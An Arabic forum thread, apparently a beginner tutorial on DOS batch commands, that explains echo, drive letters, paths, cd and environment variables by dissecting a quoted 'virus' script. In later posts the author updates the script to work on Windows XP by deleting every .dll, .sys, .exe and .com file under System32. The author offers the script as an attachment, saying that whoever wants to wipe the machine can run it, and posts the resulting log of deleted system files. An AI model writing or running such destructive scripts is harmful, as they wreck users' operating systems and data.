من لديه إستفسار حول أوامر الدوس يتفضل

    • من لديه إستفسار حول أوامر الدوس يتفضل


      كنت أتصفح بعض المواضيع القديمة بساحة التقنية و وجدت موضوع عن كيفية
      صناعة فيروس كان من منقول أحد الأعضاء و به طريقة لصناعة فيروس بسيط
      لذالك سأبدء به و بشرح عمل هذا الفيروس بالويندوس


      أنقل لكم أوامر الفيروس


      كود المصدر

      1. [align=center][size=14][FONT=Simplified Arabic][COLOR=black]@Echo off [/COLOR][/FONT][/SIZE]
      2. [size=14][FONT=Simplified Arabic][COLOR=black]c: [/COLOR][/FONT][/SIZE]
      3. [size=14][FONT=Simplified Arabic][COLOR=black]cd %WinDir%\System\ [/COLOR][/FONT][/SIZE]
      4. [size=14][FONT=Simplified Arabic][COLOR=black]deltree /y *.dll [/COLOR][/FONT][/SIZE]
      5. [size=14][FONT=Simplified Arabic][COLOR=black]cd\ [/COLOR][/FONT][/SIZE]
      6. [size=14][FONT=Simplified Arabic][COLOR=black]deltree /y *.sys [/COLOR][/FONT][/SIZE][/align]


      أولا أوامر الدوس تنفذ على نوعين من السكاربتات


      الأول سكاربت أو ملف بامتداد أو من نوع BAT


      هذا الإمتداد يدعمه الويندوس مي و الويندوس ثمانية وتسعين
      و أيضا الويندوس خمسة و تسعين و طبعا الويندوس ألفين و أكس بي
      و ويندوس فيتسا


      وهذا كما يظهر بشكله على الويندوس




      الإمتداد الأخر هووه امتداد CMD لا يدعمه الويندوس القديم و يندوس 98 و ويندوس
      مي و ويندوس خمسة و تسعين و هووه مدعوم من قبل الويندوس نت ويندوس 2000
      و ويندوس أكسبي و الجديد فيتسا و هذا كما يظهر بشكله على الويندوس




      كيف يمكن كتابة الأوامر بهذان السكاربتان ممكن أن ستخدم محرر المفكرة أو النوت باد لفتحه
      الطريقة السريعة لهذه العملية هي كلك يمين على الملف ثم إختاير تحرير أو EDIT كما على
      هذه الصورة التالية




      من بعد يفح برنامج المفكرة محررا ملف السكاربت عليه


      عندما نريد إدراج أوامر نقوم بكتابتها ثم نختار حفض من خيار المفكرة
      لحفضها على ملف السكاربت


      لإنشاء ملف سكاربت جديد نفتح برنامج المفكرة نقوم بكتابة الأوامر
      ثم تختار خيار خفض باسم SAVE AS يفتح خيار حفض باسم كما
      على هذه الصورة





      على خيار أو الحقل FILE NAME نكتب اسم السكاربت مع امتداده كما يظهر على الصورة
      CMD.CMD الاسم CMD قبل النقطة و الإمتداد CMD بعد النقطة ثم من بعد نختار من
      خيار SAVE AS TYPE أو من القائمة المنسدلة لهذا الخيار العبارة ALL FILES و أخيرا
      نختار خيار حفض أو SAVE من بعد تحديد مكان الحفض من القائمة المنسدلة العلوية
      بهذه الصورة و بذلك سيتم إنشاء سكاربت جديد من نوع سي أم دي CMD



      نبداء بشرح الفيروس السابق أولا ما هووه الفيروس عبارة عن أوامر برمجية توظف
      توظيف سئ يعني مثل اوامر أي لغة برمجية طبعا الأوامر البرمجية تقوم بوظائف
      متنوعة و مختلفة و دقيقة حتى أن بعض الأوامر البرمجية يمكنها تجاوز الجدار
      الناري للويندوس او أي برنامج حماية طبعا تجاوز مشروع كما على خدمة فتح
      بورت الأف تي بي بدون رسالة من الجدار الناري للويندوس عند فتحه لأول مرة
      و طبعا الغرض من هذه الأوامر القيام بعمليات التي يؤديها البرنامج المتكامل و الذي
      يتألف من مجموعة أوامر متعددة و متنوعة حسب الغرض الذي ينجزه هذا
      البرنامج كيف يكون هذا الاستخدام السئ كمثال مثل البانزين يمكن أن يكون
      مصدر لطاقة و مممكن أن يكون و سيلة لحرق منزل أو سيارة و نبدء بالشرح


      @Echo off


      Echo
      يستخد هذا الأمر لطباعة عبارات أو كلمات على منفذ أوامر الدوس أرشادية مثلا
      لمستخدم سكاربت الدوس و عند استخدام الأمر هذا مع الإضافة OFF@ فهذا يعني
      تعطيل الرسائل التي يطبعها منفذ أوامر الدوس و الصادرة عن تنفيذ الأوامر المختلفة
      عليه لأنها رسائل تخص مبرمج سكاربت الدوس تعطيه الأخطاء التي قام برتكابها
      أو نتاج عملية تفيذ الأوامر التي برمجها لذلك لتجنب الثرثرة البرمجية أمام المستخدم
      يتم تعطيل أغلب هذه الرسائل الصادرة عن تنفيذ الأوامر البرمجية و طبعا هذا مهم
      أيضا في عملية صناعة فيروس تجنيب المستخدم كل ما يرشده لعمل هذا الفيروس
      و أيضا يمكن تعطيل هذا الأمر بعد تفعيلة لو أردنا بإضافة بدل OFF نضيف ON
      تجربة على الأمر نفتح سكاربت CMD جديد ثم ننسخ الكود التالي و نحفضه بهذا
      السكاربت


      ECHO .
      ECHO .
      ECHO .
      ECHO hello world
      pause


      و من بعد نشغل السكاربت ليتم كتابة عبارة hello world على منفذ أوامر الدوس ثم
      من بعد نضغط اي مفتاح في لوحة المفاتيح لإقفال السكاربت سنلاحض بأن هناك
      لخبطة و سطور مع هذه الكلمة لا داعي لها تخص المبرمج الآن سنستخدم تعطيل
      الرسائل الصادرة عن تنفيذ الأوامر باستخدام أمر @Echo off كما على هذا الكود


      @Echo off
      ECHO .
      ECHO .
      ECHO .
      ECHO hello world
      ECHO .
      ECHO .
      ECHO .
      pause


      سنلاحض بأن العبارة hello world تم كتابتها لوحدها و بدون لخبطة و مسارات
      طبعا لتجربة هذا الكود تقوم بنسخه و حفضه على السكاربت ثم تشغيل السكاربت
      بالنقر المزتوج عليه و لكن هناك رسالة لم يتم حذفها وهي
      Press any key to continue . . .


      هذه رسالة تخص المستخدم وهي خاصة بامر توقيف القرائة pause مثل توقيف ملف
      الفيديو على برنامج مادي بلير و كما يظهر الأمر بأخر الكود


      إنتهينا من هذا الأمر


      و لهذا الموضوع بقية اليوم إن شاء الله

    • كود المصدر

      1. [/SIZE]
      2. [size=18] [/SIZE]
      3. [FONT=Simplified Arabic][size=18]c: [/SIZE][/FONT]
      4. [FONT=Simplified Arabic][size=18]cd %WinDir%\System\ [/SIZE][/FONT]
      5. [size=18]


      نكمل باقي الفيروس و قد شرحت بلأمس أمر @Echo off




      c:




      هذا الأمر السابق يستخدم لتغير مسار عمل محث الدوس




      - أولا ما هووه المسار سوف أشرح المسار بالتفصيل




      و لكي أقوم بشرح ما هووه المسار بالبرمجة عليك أولا أن تقوم بالتالي




      - قم بإنشاء مجلد جدي على المحرك السي باسم "OMAN"
      - إفتح مجلد "OMAN" و قم بإنشاء مجلد جديد بداخله باسم "ALDAKHALIA"
      - إفتح مجلد "ALDAKHALIA" و قم بإنشاء مجلد جديد بداخله باسم "NIZWA"





      الآن إفتح مجلد "NIZWA" إذهب لعنوان النافذة بأعلاها ستجد مسار مجلد نزوى
      مكتوب على العنون كما على الصورة التالية










      هذا هووه المسار و تبدء بشرحه
      C:\OMAN\ALDAKHALIA\NIZWA





      المسار معناه موقع المجلد أو الملف على الويندوس و لا يتطابق مجلدان أو ملفان
      موجودان على الويندوس في مسارهما إطلاقا بمعنى كل ملف أو مجلد بالويندوس
      له مساره الخاص به مثل الأيبي نمبر للجهاز على الشبكة





      كيف يحدد المسار موقع الملف على الويندوس أولا نقطة إنطلاقة المسار على
      الويندوس بنسبة للمجلدات أو الملفات هووه المحرك أو الدرايف مثالا المحرك
      السي أو المحرك الدي أو المحرك الإي و يعتبر المحرك هووه جذر المسار
      ثم من بعد يأتي جذع المسار و الأغصان و الفروع و كأن العملية شجرة لها
      جذر و جذع و فروع و سيقان نبدء بتفكيك المسار السابق





      C:\OMAN\ALDAKHALIA\NIZWA




      نأخذ أول جزء من المسار السابق و هووه كما يظهر باللون الأحمر كتالي




      C:\OMAN\ALDAKHALIA\NIZWA




      دائما أول حرف من المسار يكون نفس حرف المحرك أو الدرايف الموجود
      عليه المجلد أو الملف و الذي يخصه أو يمثله هذا المسار من بعد تأتي النقطتين
      الرأسيتين و هما لا يأتيان إلا بعد حرف المحرك أو الدرايف على الويندوس
      ثم من بعد شرطة و هي دائما تدل على الخروج من نقطة بالمسار و الدخول
      نحو نقطة أخرى و النقطة طبعا عبارة عن محرك أو مجلد أو ملف





      طبعا العملية تكون تسلسلية و بما أنه لا يوجد ما يسبق المحرك أو الدرايف
      فإنه يكون بأول المسار كما يظهر على هذا المثال لمسار مجلد نزوى





      C:\OMAN\ALDAKHALIA\NIZWA




      نأخذ الجزء الثاني المسار و هووه كما يظهر بالون الأحمر تاليا




      C:\OMAN\ALDAKHALIA\NIZWA




      أولا نلاحض بأن هذا الجزء من المسار بنفس اسم المجلد الذي أنشئناه سابقا
      "OMAN" و هذا الجزء يمثل المجلد "OMAN" الموجود على الدرايف
      أو المحرك السي مباشرة و دائما الجزء من المسار و الذي يمثل مجلد معين
      يكون بنفس اسم هذا المجلد ملاحضة أخرى لا يمكن أن يأتي هذا الجزء من
      المسار على تنضيم تسلسل المسار سابقا لدريف أو المحرك السي لأنه مجود
      عليه و نلاحض الشرطة المائلة و هي تدل على نهاية نقطة المجلد "OMAN"
      و الدخول لنقطة التالية و هووه الجزء التالي من المسار كما يظهر تاليا باللون
      الأحمر





      C:\OMAN\ALDAKHALIA\NIZWA




      نلاحض بأن هذا الجزء من المسار بنفس اسم المجلد الذي أنشئناه سابقا
      "ALDAKHALIA" و هذا الجزء يمثل المجلد "ALDAKHALIA"
      الموجود بداخل المجلد "OMAN" و لا يمكن أن يأتي هذا الجزء من
      المسار سابقا للمجلد "OMAN" على تنظيم تسلسل المسار لأن مجلد
      "ALDAKHALIA" موجود بداخل مجلد "OMAN " و كذلك لا
      يمكن أن يأتي مجلد "ALDAKHALIA" في تسلسل المسار سابقا
      لدرايف السي لأنه يأتي بموقعه على الويندوس بداخل مجلد "OMAN"
      الموجود على الداريف أو المحرك السي و نلاحض بلأخير الشرطة
      المائلة و الدالة على الخروج من نقطة مجلد "ALDAKHALIA"
      و الدخول إلى النقطة الجديدة من المسار كما تظهر بالون الأحمر تاليا





      C:\OMAN\ALDAKHALIA\NIZWA




      نلاحض بأن هذا الجزء من المسار بنفس اسم المجلد "NIZWA" و هذا
      الجزء من السمسار يمثل المجلد "NIZWA" الموجود بموقعه على
      الويندوس بداخل المجلد "ALDAKHALIA" و لا يمكن أن يأتي هذا
      الجزء من المسار سابقا لمجلد "ALDAKHALIA" و أيضا لمجلد
      "OMAN" و أيضا لدرايف أو المحرك السي على تسلسل تنظيم
      المسار لماذا لأن موقعه على الويندوس بداخل المجلد "ALDAKHALIA"
      الموجود بداخل مجلد "OMAN" الموجود على الدرايف السي





      ملاحضة أخيره طبعا هذا المسار بإكمله هووه يمثل أو يخص المجلد "NIZWA"
      و كما نلاحض بأن الجزء الذي يمثل المجلد "NIZWA" من المسار هووه أخر جزء
      به و هذا هووه الحال لأي مسار الملف أو المجلد او الدرايف الذي يمثله المسار يكون
      أخر جزء منه أو به






      بعد شرح معنى المسار سئبدء بشرح الأمر السابق




      c:
      المفروض أن تأتي النقطتين قبل السي و لكن الكتابة تكون عكسية على
      محرر أتش تي أم أل أو محرر الويب للمنتديات لو نسخت الأمر السابق
      على المفكرة سيظهر بوضعه الطبيعي هذا الأمر معناه على الويندوس هووه
      عندما ننقر دبل كلك على محرك السي بالويندوس لنفتحه لكن على الدوس
      لا يمكن استخدام الماوس لهذه العملية و طبعا الدوس ليس رسوميا بنوافذ
      لذلك عندما نريد أن نفتح المحرك أو بمعنى أخر نذهب لموقع معين على
      نظام الويندوس لنعمل عليه نقوم باستخدام أمر محدد و معنى هذا الأمر
      السابق الدخول أو فتح أو الذهاب للمحرك السي أو بمعنى أخر نجعل
      الدوس يعمل على المحرك السي و بمعنى أخر نغير محث الدوس
      للمحرك أو الدرايف أو البارتشن أو القسم السي و سأطرح ثلاث
      أمثلة لثلاث محركات مع إستخدام أمر





      سنقوم بتشغيل ملف برمجي مع استخدام هذا الأمر موجود على
      الدريف السي سنقوم بتشغيله من درايف أخر مثلا الدي أو من
      أي موقع بالويندوس فقط قم بوضع الملف البرمجي MS.EXE
      على الدرايف السي ثم ضع السكاربت على أي موقع بالويندوس
      الدرايف الدي مثلا أو أي موقع أخر و قم بتشغيله و سيقوم
      السكاربت أولا عن طريق الأمر السابق بالدخول لدرايف السي
      ثم سيقوم أمر التشغيل بتشغيل الملف MS.EXE الموجود على
      المحرك السي و هذا هووه الأمر مع أمر تشغيل الملف




      كود المصدر

      1. [align=center]C:
      2. MS.exe
      3. pause [/align]


      و المثال على المرفق التالي



      ضع الملف MS.EXE مباشرة على المحرك السي




      ضع الملف CMD.CMD على أي موقع أخر بالويندوس
      ثم قم بتشغيله ليقوم بدوره بتشغيل الملف MS.EXE





      الملفان من المرفقات و لهذا الشرح بقية غدا إن شاء الله لكم التحية

    • cd %WinDir%\System\

      نكمل هذا الموضوع للفائدة

      إنهينا عند الأمر
      C:
      و هوو الأمر الذي نقوم عن طريقه بتغير محث الدوس على الدرايف السي
      مع ملاحضة عند ما نريد تغير المحث على الدرايف D مثالا سيكون الأمر

      كتالي

      D:

      بمعنى حرف الدرايف ثم نقطتين رأسيتين و هكذا على جميع الدرايفات

      نبدء بالجزء التالي من الفيروس و هذا هووه

      cd %WinDir%\System\


      نلاحض بأول هذا الجزء من الفيروس أمر
      cd
      من بعد مسار مجلد سيستم و هووه مجلد تطبيقات الويندوس و أيضا مجلد
      ملفات مكتبات dll و هووه المجلد الذي يحتوي على أكبر عدد من الملفات
      بالويندوس و هذا هووه المسار

      %WinDir%\System\

      و أظن بأن هذا الفيروس يعمل على الويندوس القديم 98 و 95 و مي

      من حيث أن الويندوس الحديث 2000 و ويندوس أكسبي و حتى فيتسا
      مجلد النظام هووه System32 و ليس System و لكن نكمل باقي الفيروس

      نبدء بأمر سيدي cd

      هذا الأمر معناه على الويندوس الذهاب لموقع معين مثلا إلى المستندات
      أو إلى مجلد البرامج أو مجلد معين على الويندوس ثم نقوم بفتحه

      و الآن سنعرف أهمية المسار طبعا المسار هووه ما يحدد موقع المجلد أو
      موقع الملف على الويندوس كما ذكرت بالشرح السابق

      و معنى الأمر السابق مع المسار هووه الذهاب إلى مجلد System أو بمعنى
      أخر جعل محث الدوس يعمل على مجلد System

      مع ملاحضة بأن هذا المسار غريب قليلا ليس كالمسار العادي و هذا هووه

      %WinDir%\System\
      نأخذ الجزء الغريب من المسار و هووه

      %WinDir%

      نلاحض من الاسم Win و معها Dir

      Win مختصرة لمفردة Windows
      Dir مختصر لمفردة directory

      و معنى directory بالعربي مجلد و يمكن تسمية directory أيضا
      باسم folder هما مسميان لنفس المسمى

      إذ إتضح الأمر هذا الجزء من المسار يمثل مجلد الويندوس و الذي
      يوجد عادتا على المحرك السي محرك نظام الويندوس

      و يطلق على هذا الجزء من المسار مسمى مايكرو

      الميكور في البرمجة أو على لغة السي بلس و حتى باقي اللغات
      هووه عبارة عن متغير يسطلح عادتا بأن يكون هذا المتغير أولا يحمل
      اسم معين بمعنى لا يفضل استخدام أي اسم لهذا المتغير مع أنه
      بلإمكان إختيار أي إسم له ثانيا يفضل أن يكون هذا المتغير غير قابل
      لتعديل بمعنى لا يمكن تغير قيمته و ذلك عن طريق أمر Const
      و بحيث يكون اسم هذا المتغير يشير إلى القيمة التي يحملها

      بنسبة لدوس الميكرو فيه مختلف لأن لغة الدوس البرمجية بسيطة
      جدا لذلك اسم الميكرو فيها ثابت لا يمكن تغيره و أيضا هذا النوع من
      الميكرو و الذي يخص المسارات هووه ثابت القيمة مع ملاحضات بأن
      هذه القيمة تتغير بالنظر إلى تغير المسار فمثلا بلإمكان أن يكون
      نظام الويندوس موجود على الدرايف الدي لذلك ستتغير قيمة هذا
      الميكرو نظرا لتغير موقع أو مكان وجود الويندوس على الهارد ديسك


      إذا هذا الميكرو هووه مسار مجلد الويندوس و الذي يوجد عادتا على
      الدرايف السي و هذا هووه مسار مجلد الويندوس للويندوس أكسبي
      إذا كان موجودا على الدرايف السي

      C:\WINDOWS

      هذا الميكرو مهمته هووه أن يعطينا عند استخدامه قيمة تحمل بيانات
      هذه البيانات تمثل مسار مجلد الويندوس الذي هووه C:\WINDOWS

      فمثالا لو كان نظام الويندوس موجود على المحرك D سيعطينا هذا
      الميكرو المسار التالي

      D:\WINDOWS

      لو فرضا كان نظام الويندوس موجود على المحرك E سيعطينا هذا
      الميكرو المسار التالي

      E:\WINDOWS

      نكمل باقي المسار System

      من المعروف بأن مجلد النظام بالويندوس "System" أو "System32"

      في زمان صناعة هذا الفيروس و حتى الآن موجود بداخل مجلد Windows
      لذالك قام هذا القرصان بإكمال المسار نفرض بأن نظام الويندوس موجود
      على المحرك E سيكون نتيجة باقي المسار مع الميكرو كتالي

      E:\WINDOWS\System

      نفرض بأن نظام الويندوس موجود على المحر D سيكون نتيجة باقي المسار
      مع الميكرو كتالي

      D:\WINDOWS\System

      لماذا قام هذا القرصان باستخدام الميكرو و لم يستخدم مثلا مسارا عاديا
      كمثال

      C:\WINDOWS\System

      أو مثالا

      E:\WINDOWS\System

      أو مثالا

      D:\WINDOWS\System

      السبب لكي يضمن عمل هذا الفيروس أينما وجو نظام الويندوس على الهارد
      ديسك فالمايكرو تتغير قيمته أو المسار الذي يعطينا إياه مع تغير موقع الويندوس
      على الهارديسك

      و هناك العديد من المايكرو لدوس و منها التالية

      MS DOS
      %APPEND%
      %BLASTER%
      %COMSPEC%
      %COPYCMD%
      %DIRCMD%
      %DOSSHELL%
      %MSDOSDATA%
      %NO_SEP%
      %PATH%
      %PROMPT%
      %TEMP%
      %TZ%
      additional variables in: MS WINDOWS
      %CMDLINE%
      %COMPUTERNAME%
      %TMP%
      %winbootdir%
      %windir%
      %WINPMT%
      additional variables in: MS WINDOWS NT
      %ALLUSERSPROFILE%
      %APPDATA%
      %CD%
      %CMDCMDLINE%
      %CMDEXTVERSION%
      %COMMONPROGRAMFILES%
      %DATE%
      %ERRORLEVEL%
      %HOMEDRIVE%
      %HOMEPATH%
      %HOMESHARE%
      %LOGONSERVER%
      %MORE%
      %NUMBER_OF_PROCESSORS%
      %OS%
      %OS2LIBPATH%
      %PATHEXT%
      %PROCESSOR_ARCHITECTURE%
      %PROCESSOR_IDENTIFER%
      %PROCESSOR_LEVEL%
      %PROCESSOR_REVISION%
      %PROGRAMFILES%
      %RANDOM%
      %SESSIONNAME%
      %SYSTEMDRIVE%
      %SYSTEMROOT%
      %TIME%
      %USERDOMAIN%
      %USERNAME%
      %USERPROFILE%

      ولهذا الموضوع بقية

      تم تحرير الموضوع 2 مرة, آخر مرة بواسطة ناقوس الخطر ().

    • نكمل هذا الموضوع


      الآن سنقوم بتجربة على الأمر CD و على المايكور %WinDir% أي على
      العمليات السابقة


      كما نعلم بأن الأمر CD هووه أمر يستخدم لدخول أو لفتح مجلد أو دايركتري
      محدد أو بمعنى أخر جعل محث الدوس يعمل على مجلد أو دايركتري معين


      و كما نعلم بأن المايكرو %WinDir% هووه مايكرو يعطينا موقع مجلد Windows
      على الهارديسك أو بمعنى أخر مسار هذا المجلد و هووه مجلد ملفات نضام
      الويندوس


      وهذا كود لسكاربت التجربة


      كود المصدر

      1. [align=center][FONT=Times New Roman][size=14][COLOR=red]@Echo off [/COLOR][/SIZE][/FONT]
      2. [size=14][FONT=Times New Roman][COLOR=red]c: [/COLOR][/FONT][/SIZE]
      3. [size=14][FONT=Times New Roman][COLOR=red]@Echo on[/COLOR][/FONT][/SIZE]
      4. [size=14][FONT=Times New Roman][COLOR=red]cd %WinDir%\System32\ [/COLOR][/FONT][/SIZE]
      5. [size=14][FONT=Times New Roman][COLOR=red]echo .[/COLOR][/FONT][/SIZE]
      6. [size=14][FONT=Times New Roman][COLOR=red]@Echo off[/COLOR][/FONT][/SIZE]
      7. [size=14][FONT=Times New Roman][COLOR=red]echo .[/COLOR][/FONT][/SIZE]
      8. [size=14][FONT=Times New Roman][COLOR=red]pause[/COLOR][/FONT][/SIZE][/align]


      و هذه صورة لنتيجة الكود




      وهذا هووه ملف السكاربت جاهز من المرفقات


      بعد قليل نكمل باقي الفيروس

      تم تحرير الموضوع 1 مرة, آخر مرة بواسطة ناقوس الخطر ().

    • الآن سأقوم بتعديلات على هذه الفيروس ليعمل على الويندوس أكسبي و تحذير
      لمن يقوم باستخدامه لأنه سيعمل بالفعل و سيقوم بحذف مكتابات dll و أيضا ملفات
      النضام sys


      و قبل ذالك سأقوم بشرح باقي الفيروس


      deltree /y *.dll


      هذا الأمر deltree لا يدعمه دوس الويندوس أكسبي و أيضا حتى دوس
      الويندوس القديم و أظن أن هناك خطأ بهذا الفيروس و ذلك لعدم و جود
      هذا التطبيق deltree.exe على الويندوس و هووه موجود على بعض من
      إصدارات الدوس و التي تستخدم في BOOTDISK أو حتى كنظام ثابت
      على الهارد ديسك و الأمر deltree يستخدم لحذف الملفات على جميع
      التفرعات الشجرية نلاحض تري tree أي جميع الملفات الموجودة على
      مسار محدد و جميع التفرعات الشجرية الأخرى من نقطة هذا المسار


      *.dll
      * النجمة على الدوس تستخدم لتحديد إمتداد معين و يدخل إستخدام النجمة
      في بعض الأوامر مثل الأمر السابق deltree و أيضا أمر DEL و أيضا
      أمر REN و بعض من الأوامر الأخرى


      dll. لفض dll و معه النقطة هووه امتداد ملفات دي أل أل أو دل و هووه
      الإمتداد المستخدم لملفات المكتبات البرمجية سواء مكتبات الويندوس البرمجية
      الأساسية أو حتى بعض المكتبات البرمجية التي يتم تصميمها من قبل مبرمج
      و طبعا هم المبرمجين المتقدمين و الأكثر إحترافا و قدرة على البرمجة لأن
      هذه المكتبات التي يصمموها يقوم باستخدامها المبرمج المبتدء ليسهل عليه
      تفيذ بعض العمليات المعقدة


      العملية الآن واضحة الأمر يقوم بحذف كافة المكتبات البرمجية الأساسية
      للويندوس و هذا طبعا إستخدام سئ لهذا الأمر و بالتالي تعتبر هذه العملية
      غير مشروعة و يعتبر السكاربت كاملا فيروس



      deltree /y *.sys


      أيضا سطر أمر أخر باستخدام نفس الأمر deltree لحذف كافة الملفات التي
      تكون على الإمتداد sys و هذا الإمتداد يستخدم بالويندوس لملفات النضام
      و هي ملفات حساسة جدا و مهمة سواء لنضام الويندوس أو نضام الدوس


      و هذا هووه التعديل على السكاربت


      كود المصدر

      1. [align=center][FONT=Times New Roman][size=14][COLOR=red]@ECHO OFF[/COLOR][/SIZE][/FONT]
      2. [size=14][FONT=Times New Roman][COLOR=red]C:[/COLOR][/FONT][/SIZE]
      3. [size=14][FONT=Times New Roman][COLOR=red]CD C:\[/COLOR][/FONT][/SIZE]
      4. [size=14][FONT=Times New Roman][COLOR=red]CD %WinDir%\System32\ [/COLOR][/FONT][/SIZE]
      5. [size=14][FONT=Times New Roman][COLOR=red]DEL /S *.dll [/COLOR][/FONT][/SIZE]
      6. [size=14][FONT=Times New Roman][COLOR=red]DEL /S *.sys [/COLOR][/FONT][/SIZE]
      7. [size=14][FONT=Times New Roman][COLOR=red]DEL /S *.exe[/COLOR][/FONT][/SIZE]
      8. [size=14][FONT=Times New Roman][COLOR=red]DEL /S *.com[/COLOR][/FONT][/SIZE]
      9. [size=14][FONT=Times New Roman][COLOR=red]pause[/COLOR][/FONT][/SIZE][/align]


      التعديلات


      بدل إستخدام الأمر deltree و الذي لا يدعمه الويندوس تم إستخدام الأمر DEL
      و هووه أمر مدعوم تقريبا من كافة أنضمة الويندوس


      البريماير /S يستخدم لحذف الملفات على السب دايركتري أي سيقوم بنفس ما
      يقوم به الأمر deltree و هووه حذف كافة الملفات المجودة على التفرعات الشجرية
      بدايتا من نقطة المسار و إلى أخر تفرع شجري


      إضافة بعض من الإمتدادات الأخرى ليتم حذفها و هي exe و com إمتدادات التطبيقات
      و البرامج لنضام الويندوس و الدوس


      تحذير مجرد تشغيل السكاربت سيقوم بعمله و لن ينتظر و سيتحتم عليك أعادة تنصيب
      الويندوس


      الفيروس الإصدر الثاني من المرفقات #e من يريد فرمتت الجهاز فليقوم بتشغيله




      في أمان الله

      تم تحرير الموضوع 4 مرة, آخر مرة بواسطة ناقوس الخطر ().

    • نتائج الفيروس مع ملاحضة


      بأن بعض الملفات لن يتم حذفها لأنها قيد العمل و طبعا الملفات التي تكون
      قيد العمل أثناء تشغيل السكاربت لا يمكن حذفها حتى لو حذفتها عن طريق
      الويندوس باستخدام الماوس أو الكيبورد

      وهذه هي بعض من النتائج

      كود المصدر

      1. [/COLOR][/SIZE][/FONT]
      2. [FONT=Times New Roman][size=14][COLOR=red] [/COLOR][/SIZE][/FONT]
      3. [FONT=Times New Roman][size=14][COLOR=red]Deleted file - C:\WINDOWS\system32\dllcache\imscinst.exe
      4. Deleted file - C:\WINDOWS\system32\dllcache\inetin51.exe
      5. Deleted file - C:\WINDOWS\system32\dllcache\inetmgr.exe
      6. Deleted file - C:\WINDOWS\system32\dllcache\inetwiz.exe
      7. Deleted file - C:\WINDOWS\system32\dllcache\ipconfig.exe
      8. Deleted file - C:\WINDOWS\system32\dllcache\ipsec6.exe
      9. Deleted file - C:\WINDOWS\system32\dllcache\ipv6.exe
      10. Deleted file - C:\WINDOWS\system32\dllcache\ipxroute.exe
      11. Deleted file - C:\WINDOWS\system32\dllcache\isignup.exe
      12. Deleted file - C:\WINDOWS\system32\dllcache\krnl386.exe
      13. Deleted file - C:\WINDOWS\system32\dllcache\label.exe
      14. Deleted file - C:\WINDOWS\system32\dllcache\lhmstsc.exe
      15. Deleted file - C:\WINDOWS\system32\dllcache\lights.exe
      16. Deleted file - C:\WINDOWS\system32\dllcache\lnkstub.exe
      17. Deleted file - C:\WINDOWS\system32\dllcache\locator.exe
      18. Deleted file - C:\WINDOWS\system32\dllcache\lodctr.exe
      19. Deleted file - C:\WINDOWS\system32\dllcache\logagent.exe
      20. Deleted file - C:\WINDOWS\system32\dllcache\logman.exe
      21. Deleted file - C:\WINDOWS\system32\dllcache\logoff.exe
      22. Deleted file - C:\WINDOWS\system32\dllcache\logonui.exe
      23. Deleted file - C:\WINDOWS\system32\dllcache\lpq.exe
      24. Deleted file - C:\WINDOWS\system32\dllcache\lpr.exe
      25. Deleted file - C:\WINDOWS\system32\dllcache\lsass.exe
      26. Deleted file - C:\WINDOWS\system32\dllcache\magnify.exe
      27. Deleted file - C:\WINDOWS\system32\dllcache\makecab.exe
      28. Deleted file - C:\WINDOWS\system32\dllcache\mem.exe
      29. Deleted file - C:\WINDOWS\system32\dllcache\migisol.exe
      30. Deleted file - C:\WINDOWS\system32\dllcache\migload.exe
      31. Deleted file - C:\WINDOWS\system32\dllcache\migrate.exe
      32. Deleted file - C:\WINDOWS\system32\dllcache\migregdb.exe
      33. Deleted file - C:\WINDOWS\system32\dllcache\migwiz.exe
      34. Deleted file - C:\WINDOWS\system32\dllcache\migwiza.exe
      35. Deleted file - C:\WINDOWS\system32\dllcache\mmc.exe
      36. Deleted file - C:\WINDOWS\system32\dllcache\mmcperf.exe
      37. Deleted file - C:\WINDOWS\system32\dllcache\mnmsrvc.exe
      38. Deleted file - C:\WINDOWS\system32\dllcache\mobsync.exe
      39. Deleted file - C:\WINDOWS\system32\dllcache\mofcomp.exe
      40. Deleted file - C:\WINDOWS\system32\dllcache\mountvol.exe
      41. Deleted file - C:\WINDOWS\system32\dllcache\moviemk.exe
      42. Deleted file - C:\WINDOWS\system32\dllcache\mplay32.exe
      43. Deleted file - C:\WINDOWS\system32\dllcache\mplayer2.exe
      44. Deleted file - C:\WINDOWS\system32\dllcache\mpnotify.exe
      45. Deleted file - C:\WINDOWS\system32\dllcache\mqbkup.exe
      46. Deleted file - C:\WINDOWS\system32\dllcache\mqsvc.exe
      47. Deleted file - C:\WINDOWS\system32\dllcache\mqtgsvc.exe
      48. Deleted file - C:\WINDOWS\system32\dllcache\mrinfo.exe
      49. Deleted file - C:\WINDOWS\system32\dllcache\mscdexnt.exe
      50. Deleted file - C:\WINDOWS\system32\dllcache\msconfig.exe
      51. Deleted file - C:\WINDOWS\system32\dllcache\msdtc.exe
      52. Deleted file - C:\WINDOWS\system32\dllcache\msg.exe
      53. Deleted file - C:\WINDOWS\system32\dllcache\mshearts.exe
      54. Deleted file - C:\WINDOWS\system32\dllcache\mshta.exe
      55. Deleted file - C:\WINDOWS\system32\dllcache\msiexec.exe
      56. Deleted file - C:\WINDOWS\system32\dllcache\msimn.exe
      57. Deleted file - C:\WINDOWS\system32\dllcache\msinfo32.exe
      58. Deleted file - C:\WINDOWS\system32\dllcache\msiregmv.exe
      59. Deleted file - C:\WINDOWS\system32\dllcache\msoobe.exe
      60. Deleted file - C:\WINDOWS\system32\dllcache\mspaint.exe
      61. Deleted file - C:\WINDOWS\system32\dllcache\msswchx.exe
      62. Deleted file - C:\WINDOWS\system32\dllcache\mstinit.exe
      63. Deleted file - C:\WINDOWS\system32\dllcache\mtstocom.exe
      64. Deleted file - C:\WINDOWS\system32\dllcache\muisetup.exe
      65. Deleted file - C:\WINDOWS\system32\dllcache\napstat.exe
      66. Deleted file - C:\WINDOWS\system32\dllcache\narrator.exe
      67. Deleted file - C:\WINDOWS\system32\dllcache\nbtstat.exe
      68. Deleted file - C:\WINDOWS\system32\dllcache\nddeapir.exe
      69. Deleted file - C:\WINDOWS\system32\dllcache\net.exe
      70. Deleted file - C:\WINDOWS\system32\dllcache\net1.exe
      71. Deleted file - C:\WINDOWS\system32\dllcache\netdde.exe
      72. Deleted file - C:\WINDOWS\system32\dllcache\netsetup.exe
      73. Deleted file - C:\WINDOWS\system32\dllcache\netsh.exe
      74. Deleted file - C:\WINDOWS\system32\dllcache\netstat.exe
      75. Deleted file - C:\WINDOWS\system32\dllcache\nlsfunc.exe
      76. Deleted file - C:\WINDOWS\system32\dllcache\notepad.exe
      77. Deleted file - C:\WINDOWS\system32\dllcache\notiflag.exe
      78. Deleted file - C:\WINDOWS\system32\dllcache\nppagent.exe
      79. Deleted file - C:\WINDOWS\system32\dllcache\nslookup.exe
      80. Deleted file - C:\WINDOWS\system32\dllcache\ntbackup.exe
